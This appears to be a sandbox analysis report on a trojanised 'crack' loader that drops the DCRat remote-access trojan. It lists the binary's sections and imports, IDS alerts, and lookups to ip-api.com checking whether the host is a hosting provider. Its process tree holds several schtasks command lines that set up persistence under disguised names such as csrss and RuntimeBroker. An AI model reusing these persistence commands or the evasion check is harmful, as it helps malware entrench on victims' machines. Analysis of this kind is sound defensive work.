              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x310ea0x31200c5bf61bbedb6ad471e9dc6266398e965False0.583959526081425data6.708075396341128IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0x330000xa6120xa8007980b588d5b28128a2f3c36cabe2ce98False0.45284598214285715data5.221742709250668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x3e0000x237280x1000201530c9e56f172adf2473053298d48fFalse0.36767578125data3.7088186669877685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .didat0x620000x1880x200c5d41d8f254f69e567595ab94266cfdcFalse0.4453125data3.2982538067961342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x630000x469680x46a008426d8ceebf2528be4d7e96816c46c49False0.11474350110619469data3.4349144579338264IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0xaa0000x22680x2400c7a942b723cb29d9c02f7c611b544b50False0.7681206597222222data6.5548620101740545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountryZLIB Complexity
              PNG0x635240xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
              PNG0x6406c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
              RT_ICON0x656180x42028Device independent bitmap graphic, 256 x 512 x 32, image size 2621440.07709264135870048
              RT_DIALOG0xa76400x286dataEnglishUnited States0.5092879256965944
              RT_DIALOG0xa78c80x13adataEnglishUnited States0.60828025477707
              RT_DIALOG0xa7a040xecdataEnglishUnited States0.6991525423728814
              RT_DIALOG0xa7af00x12edataEnglishUnited States0.5927152317880795
              RT_DIALOG0xa7c200x338dataEnglishUnited States0.45145631067961167
              RT_DIALOG0xa7f580x252dataEnglishUnited States0.5757575757575758
              RT_STRING0xa81ac0x1e2dataEnglishUnited States0.3900414937759336
              RT_STRING0xa83900x1ccdataEnglishUnited States0.4282608695652174
              RT_STRING0xa855c0x1b8dataEnglishUnited States0.45681818181818185
              RT_STRING0xa87140x146dataEnglishUnited States0.5153374233128835
              RT_STRING0xa885c0x446dataEnglishUnited States0.340036563071298
              RT_STRING0xa8ca40x166dataEnglishUnited States0.49162011173184356
              RT_STRING0xa8e0c0x152dataEnglishUnited States0.5059171597633136
              RT_STRING0xa8f600x10adataEnglishUnited States0.49624060150375937
              RT_STRING0xa906c0xbcdataEnglishUnited States0.6329787234042553
              RT_STRING0xa91280xd6dataEnglishUnited States0.5747663551401869
              RT_GROUP_ICON0xa92000x14data1.1
              RT_MANIFEST0xa92140x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.39786666666666665
              DLLImport
              KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
              gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States
              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
              2024-10-04T15:43:08.930952+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649780208.95.112.180TCP
              2024-10-04T15:43:12.399719+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649803208.95.112.180TCP
              2024-10-04T15:43:16.421787+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649828208.95.112.180TCP
              2024-10-04T15:43:19.712146+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649852208.95.112.180TCP
              TimestampSource PortDest PortSource IPDest IP
              Oct 4, 2024 15:43:07.097824097 CEST4978080192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:07.102677107 CEST8049780208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:07.103086948 CEST4978080192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:07.178884029 CEST4978080192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:07.183845997 CEST8049780208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:07.580414057 CEST8049780208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:07.634038925 CEST4978080192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:08.764247894 CEST4978080192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:08.777782917 CEST8049780208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:08.882477999 CEST8049780208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:08.930952072 CEST4978080192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:11.363601923 CEST4978080192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:11.368782997 CEST8049780208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:11.368891954 CEST4978080192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:11.484736919 CEST4980380192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:11.697382927 CEST8049803208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:11.697465897 CEST4980380192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:11.697663069 CEST4980380192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:11.704617977 CEST8049803208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:12.183142900 CEST8049803208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:12.399719000 CEST4980380192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:12.402129889 CEST8049803208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:12.404262066 CEST4980380192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:14.349529982 CEST4981980192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:14.361665010 CEST8049819208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:14.361747026 CEST4981980192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:14.361923933 CEST4981980192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:14.370662928 CEST8049819208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:14.833483934 CEST8049819208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:15.050348043 CEST8049819208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:15.111035109 CEST4981980192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:15.865942955 CEST4981980192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:15.868794918 CEST4982880192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:15.872258902 CEST8049819208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:15.873825073 CEST8049828208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:15.877583027 CEST4981980192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:15.877621889 CEST4982880192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:15.877842903 CEST4982880192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:15.886087894 CEST8049828208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:16.348215103 CEST8049828208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:16.421787024 CEST4982880192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:17.438334942 CEST4980380192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:17.535017014 CEST4984080192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:17.540239096 CEST8049840208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:17.541981936 CEST4984080192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:17.542167902 CEST4984080192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:17.547200918 CEST8049840208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:18.011852980 CEST8049840208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:18.138719082 CEST4984080192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:19.140423059 CEST4984080192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:19.141268969 CEST4985280192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:19.145941973 CEST8049840208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:19.145987988 CEST4984080192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:19.146334887 CEST8049852208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:19.146392107 CEST4985280192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:19.146498919 CEST4985280192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:19.151348114 CEST8049852208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:19.614886045 CEST8049852208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:19.712146044 CEST4985280192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:20.842609882 CEST4986480192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:20.848647118 CEST8049864208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:20.848879099 CEST4986480192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:20.849035978 CEST4986480192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:20.853775978 CEST8049864208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:21.076090097 CEST4985280192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:21.342653036 CEST8049864208.95.112.1192.168.2.6
              Oct 4, 2024 15:43:21.404654980 CEST4986480192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:22.029927969 CEST4982880192.168.2.6208.95.112.1
              Oct 4, 2024 15:43:22.034228086 CEST4986480192.168.2.6208.95.112.1
              TimestampSource PortDest PortSource IPDest IP
              Oct 4, 2024 15:43:07.082932949 CEST6373653192.168.2.61.1.1.1
              Oct 4, 2024 15:43:07.089943886 CEST53637361.1.1.1192.168.2.6
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Oct 4, 2024 15:43:07.082932949 CEST192.168.2.61.1.1.10x40d3Standard query (0)ip-api.comA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Oct 4, 2024 15:43:07.089943886 CEST1.1.1.1192.168.2.60x40d3No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
              • ip-api.com
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.649780208.95.112.1803472C:\comcontainer\SurrogateRef.exe
              TimestampBytes transferredDirectionData
              Oct 4, 2024 15:43:07.178884029 CEST80OUTGET /line/?fields=hosting HTTP/1.1
              Host: ip-api.com
              Connection: Keep-Alive
              Oct 4, 2024 15:43:07.580414057 CEST175INHTTP/1.1 200 OK
              Date: Fri, 04 Oct 2024 13:43:07 GMT
              Content-Type: text/plain; charset=utf-8
              Content-Length: 6
              Access-Control-Allow-Origin: *
              X-Ttl: 60
              X-Rl: 44
              Data Raw: 66 61 6c 73 65 0a
              Data Ascii: false
              Oct 4, 2024 15:43:08.764247894 CEST56OUTGET /line/?fields=hosting HTTP/1.1
              Host: ip-api.com
              Oct 4, 2024 15:43:08.882477999 CEST175INHTTP/1.1 200 OK
              Date: Fri, 04 Oct 2024 13:43:08 GMT
              Content-Type: text/plain; charset=utf-8
              Content-Length: 6
              Access-Control-Allow-Origin: *
              X-Ttl: 58
              X-Rl: 43
              Data Raw: 66 61 6c 73 65 0a
              Data Ascii: false


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.649803208.95.112.1803472C:\comcontainer\SurrogateRef.exe
              TimestampBytes transferredDirectionData
              Oct 4, 2024 15:43:11.697663069 CEST56OUTGET /line/?fields=hosting HTTP/1.1
              Host: ip-api.com
              Oct 4, 2024 15:43:12.183142900 CEST175INHTTP/1.1 200 OK
              Date: Fri, 04 Oct 2024 13:43:11 GMT
              Content-Type: text/plain; charset=utf-8
              Content-Length: 6
              Access-Control-Allow-Origin: *
              X-Ttl: 55
              X-Rl: 42
              Data Raw: 66 61 6c 73 65 0a
              Data Ascii: false
              Oct 4, 2024 15:43:12.402129889 CEST175INHTTP/1.1 200 OK
              Date: Fri, 04 Oct 2024 13:43:11 GMT
              Content-Type: text/plain; charset=utf-8
              Content-Length: 6
              Access-Control-Allow-Origin: *
              X-Ttl: 55
              X-Rl: 42
              Data Raw: 66 61 6c 73 65 0a
              Data Ascii: false


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.649819208.95.112.1803472C:\comcontainer\SurrogateRef.exe
              TimestampBytes transferredDirectionData
              Oct 4, 2024 15:43:14.361923933 CEST80OUTGET /line/?fields=hosting HTTP/1.1
              Host: ip-api.com
              Connection: Keep-Alive
              Oct 4, 2024 15:43:14.833483934 CEST175INHTTP/1.1 200 OK
              Date: Fri, 04 Oct 2024 13:43:14 GMT
              Content-Type: text/plain; charset=utf-8
              Content-Length: 6
              Access-Control-Allow-Origin: *
              X-Ttl: 52
              X-Rl: 41
              Data Raw: 66 61 6c 73 65 0a
              Data Ascii: false
              Oct 4, 2024 15:43:15.050348043 CEST175INHTTP/1.1 200 OK
              Date: Fri, 04 Oct 2024 13:43:14 GMT
              Content-Type: text/plain; charset=utf-8
              Content-Length: 6
              Access-Control-Allow-Origin: *
              X-Ttl: 52
              X-Rl: 41
              Data Raw: 66 61 6c 73 65 0a
              Data Ascii: false


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              3192.168.2.649828208.95.112.1803472C:\comcontainer\SurrogateRef.exe
              TimestampBytes transferredDirectionData
              Oct 4, 2024 15:43:15.877842903 CEST56OUTGET /line/?fields=hosting HTTP/1.1
              Host: ip-api.com
              Oct 4, 2024 15:43:16.348215103 CEST175INHTTP/1.1 200 OK
              Date: Fri, 04 Oct 2024 13:43:15 GMT
              Content-Type: text/plain; charset=utf-8
              Content-Length: 6
              Access-Control-Allow-Origin: *
              X-Ttl: 51
              X-Rl: 40
              Data Raw: 66 61 6c 73 65 0a
              Data Ascii: false


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              4192.168.2.649840208.95.112.1803472C:\comcontainer\SurrogateRef.exe
              TimestampBytes transferredDirectionData
              Oct 4, 2024 15:43:17.542167902 CEST80OUTGET /line/?fields=hosting HTTP/1.1
              Host: ip-api.com
              Connection: Keep-Alive
              Oct 4, 2024 15:43:18.011852980 CEST175INHTTP/1.1 200 OK
              Date: Fri, 04 Oct 2024 13:43:17 GMT
              Content-Type: text/plain; charset=utf-8
              Content-Length: 6
              Access-Control-Allow-Origin: *
              X-Ttl: 49
              X-Rl: 39
              Data Raw: 66 61 6c 73 65 0a
              Data Ascii: false


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              5192.168.2.649852208.95.112.1803472C:\comcontainer\SurrogateRef.exe
              TimestampBytes transferredDirectionData
              Oct 4, 2024 15:43:19.146498919 CEST56OUTGET /line/?fields=hosting HTTP/1.1
              Host: ip-api.com
              Oct 4, 2024 15:43:19.614886045 CEST175INHTTP/1.1 200 OK
              Date: Fri, 04 Oct 2024 13:43:19 GMT
              Content-Type: text/plain; charset=utf-8
              Content-Length: 6
              Access-Control-Allow-Origin: *
              X-Ttl: 47
              X-Rl: 38
              Data Raw: 66 61 6c 73 65 0a
              Data Ascii: false


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              6192.168.2.649864208.95.112.1803472C:\comcontainer\SurrogateRef.exe
              TimestampBytes transferredDirectionData
              Oct 4, 2024 15:43:20.849035978 CEST80OUTGET /line/?fields=hosting HTTP/1.1
              Host: ip-api.com
              Connection: Keep-Alive
              Oct 4, 2024 15:43:21.342653036 CEST175INHTTP/1.1 200 OK
              Date: Fri, 04 Oct 2024 13:43:20 GMT
              Content-Type: text/plain; charset=utf-8
              Content-Length: 6
              Access-Control-Allow-Origin: *
              X-Ttl: 46
              X-Rl: 37
              Data Raw: 66 61 6c 73 65 0a
              Data Ascii: false


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:09:42:49
              Start date:04/10/2024
              Path:C:\Users\user\Desktop\NewLoaderCracks_1.32.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\NewLoaderCracks_1.32.exe"
              Imagebase:0x540000
              File size:2'064'076 bytes
              MD5 hash:957E3773E9346CEE687C19FCE88B7F4A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true

              Target ID:2
              Start time:09:42:50
              Start date:04/10/2024
              Path:C:\Windows\SysWOW64\wscript.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\WScript.exe" "C:\comcontainer\Kr8tZ.vbe"
              Imagebase:0xe50000
              File size:147'456 bytes
              MD5 hash:FF00E0480075B095948000BDC66E81F0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:3
              Start time:09:43:00
              Start date:04/10/2024
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\system32\cmd.exe /c ""C:\comcontainer\xNFGfK2ypxJsgsGsm5kX9.bat" "
              Imagebase:0x1c0000
              File size:236'544 bytes
              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:4
              Start time:09:43:01
              Start date:04/10/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff66e660000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:5
              Start time:09:43:02
              Start date:04/10/2024
              Path:C:\comcontainer\SurrogateRef.exe
              Wow64 process (32bit):false
              Commandline:"C:\comcontainer\SurrogateRef.exe"
              Imagebase:0x20000
              File size:1'515'008 bytes
              MD5 hash:A730EA6D448D235275000CF8ADA09A96
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2465802434.0000000002937000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2465802434.0000000002391000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2472557377.000000001239D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Antivirus matches:
              • Detection: 100%, Avira
              • Detection: 100%, Joe Sandbox ML
              • Detection: 88%, ReversingLabs
              Reputation:low
              Has exited:true

              Target ID:9
              Start time:09:43:10
              Start date:04/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQS" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\jdownloader\config\SwpTnCnrsAAKjgTAQ.exe'" /f
              Imagebase:0x7ff7bd6e0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:10
              Start time:09:43:10
              Start date:04/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQ" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\config\SwpTnCnrsAAKjgTAQ.exe'" /rl HIGHEST /f
              Imagebase:0x7ff7bd6e0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:11
              Start time:09:43:10
              Start date:04/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\jdownloader\config\SwpTnCnrsAAKjgTAQ.exe'" /rl HIGHEST /f
              Imagebase:0x7ff7bd6e0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:12
              Start time:09:43:10
              Start date:04/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Recovery\csrss.exe'" /f
              Imagebase:0x7ff7bd6e0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:13
              Start time:09:43:11
              Start date:04/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f
              Imagebase:0x7ff7bd6e0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:14
              Start time:09:43:11
              Start date:04/10/2024
              Path:C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files (x86)\jdownloader\config\SwpTnCnrsAAKjgTAQ.exe"
              Imagebase:0xc10000
              File size:1'515'008 bytes
              MD5 hash:A730EA6D448D235275000CF8ADA09A96
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000E.00000002.2486586475.0000000003081000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Antivirus matches:
              • Detection: 88%, ReversingLabs
              Reputation:low
              Has exited:true

              Target ID:15
              Start time:09:43:11
              Start date:04/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f
              Imagebase:0x7ff799c70000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:17
              Start time:09:43:12
              Start date:04/10/2024
              Path:C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files (x86)\jdownloader\config\SwpTnCnrsAAKjgTAQ.exe"
              Imagebase:0xdc0000
              File size:1'515'008 bytes
              MD5 hash:A730EA6D448D235275000CF8ADA09A96
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.2486585028.0000000003081000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Reputation:low
              Has exited:true

              Target ID:19
              Start time:09:43:12
              Start date:04/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Recovery\WmiPrvSE.exe'" /f
              Imagebase:0x7ff7bd6e0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:20
              Start time:09:43:12
              Start date:04/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
              Imagebase:0x7ff7bd6e0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:21
              Start time:09:43:12
              Start date:04/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
              Imagebase:0x7ff7bd6e0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:22
              Start time:09:43:13
              Start date:04/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\jdownloader\config\RuntimeBroker.exe'" /f
              Imagebase:0x7ff7bd6e0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:23
              Start time:09:43:13
              Start date:04/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\config\RuntimeBroker.exe'" /rl HIGHEST /f
              Imagebase:0x7ff7bd6e0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:24
              Start time:09:43:13
              Start date:04/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\jdownloader\config\RuntimeBroker.exe'" /rl HIGHEST /f
              Imagebase:0x7ff7bd6e0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:25
              Start time:09:43:13
              Start date:04/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
